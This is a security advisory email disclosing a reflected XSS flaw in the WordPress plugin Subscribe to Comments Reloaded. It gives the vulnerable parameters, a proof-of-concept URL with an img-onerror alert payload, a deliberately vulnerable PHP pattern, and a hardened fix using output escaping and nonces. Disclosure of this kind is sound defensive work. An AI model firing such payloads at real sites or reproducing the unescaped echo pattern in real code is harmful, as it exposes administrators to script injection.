Subject: Cross-Site Scripting (XSS) in Subscribe to Comments Reloaded 150611
Date: Thu, 20 Aug 2015 16:00:44 +0200

Hello,

Plugin: Subscribe to Comments Reloaded 150611 https://wordpress.org/plugins/subscribe-to-comments-reloaded/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated administrators can inject HTML/JS code through the parameters listed below. The admin page performs no CSRF (nonce) check on these requests, so the payload can also be delivered by getting a logged-in administrator to open a crafted link.

Method: GET
Url: http://localhost/wp-admin/options-general.php?page=subscribe-to-comments-reloaded%2Foptions%2Findex.php&subscribepanel=1&sra=edit-subscription&srp=[xss]
Vulnerable parameters: srp, sre

Example PHP callstack:
/subscribe-to-comments-reloaded/options/panel1-edit-subscription.php:14

Verification:
http://localhost/wp-admin/options-general.php?page=subscribe-to-comments-reloaded%2Foptions%2Findex.php&subscribepanel=1&sra=edit-subscription&srp=%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E
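To make the fix concrete, the following is an added, illustrative PHP fragment. It is not the plugin's own panel1-edit-subscription.php; the function names, the form layout and the meaning assumed for the two parameters (srp as the post id, sre as the subscriber e-mail) are assumptions. It shows the reflecting pattern that produces this class of bug next to a hardened version that escapes each parameter for its output context and ties the edit action to a WordPress nonce, which is the missing CSRF protection noted above.

```php
<?php
// Illustrative example, NOT the plugin's own code.
// Assumption: an admin panel receives srp (post id) and sre (subscriber
// e-mail) from the query string and echoes them back into an edit form.

// --- Vulnerable pattern: GET values are echoed verbatim into HTML, so
// srp=<img src=x onerror=alert(1) /> runs in the administrator's browser.
function stcr_example_render_edit_form_vulnerable() {
    $srp = isset( $_GET['srp'] ) ? $_GET['srp'] : '';
    $sre = isset( $_GET['sre'] ) ? $_GET['sre'] : '';
    echo '<h3>Editing subscription for ' . $sre . ' on post ' . $srp . '</h3>';
    echo '<input type="text" name="srp" value="' . $srp . '" />';
}

// --- Hardened pattern.
function stcr_example_render_edit_form_hardened() {
    // 1. Nonce check: a link the attacker crafts cannot carry a valid nonce,
    //    so the request dies here before anything is reflected.
    check_admin_referer( 'stcr_example_edit_subscription' );

    // 2. Normalise input: undo WordPress' magic slashes, then sanitise for
    //    the type each field is expected to hold.
    $srp = isset( $_GET['srp'] ) ? sanitize_text_field( wp_unslash( $_GET['srp'] ) ) : '';
    $sre = isset( $_GET['sre'] ) ? sanitize_email( wp_unslash( $_GET['sre'] ) ) : '';

    // 3. Escape for the output context: esc_html() between tags,
    //    esc_attr() inside an attribute value. Sanitising on input is
    //    not a substitute for this step.
    echo '<h3>Editing subscription for ' . esc_html( $sre )
        . ' on post ' . esc_html( $srp ) . '</h3>';
    echo '<input type="text" name="srp" value="' . esc_attr( $srp ) . '" />';
}

// Builds the edit link the plugin itself would emit, so the nonce check in
// the hardened renderer passes for legitimate use and fails for crafted URLs.
function stcr_example_edit_link( $post_id, $email ) {
    $url = add_query_arg(
        array(
            'page'           => 'subscribe-to-comments-reloaded/options/index.php',
            'subscribepanel' => 1,
            'sra'            => 'edit-subscription',
            'srp'            => absint( $post_id ),
            'sre'            => rawurlencode( $email ),
        ),
        admin_url( 'options-general.php' )
    );
    return wp_nonce_url( $url, 'stcr_example_edit_subscription' );
}
```

The nonce does not remove the injection itself; escaping on output does that. The nonce closes the delivery path the advisory points at: without it, any URL an administrator can be talked into opening reaches the reflecting code. If srp is really only ever a numeric post id, casting it with absint() in the renderer is stricter than sanitize_text_field() and is the better choice.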

--
Regards,
Marcin Probola,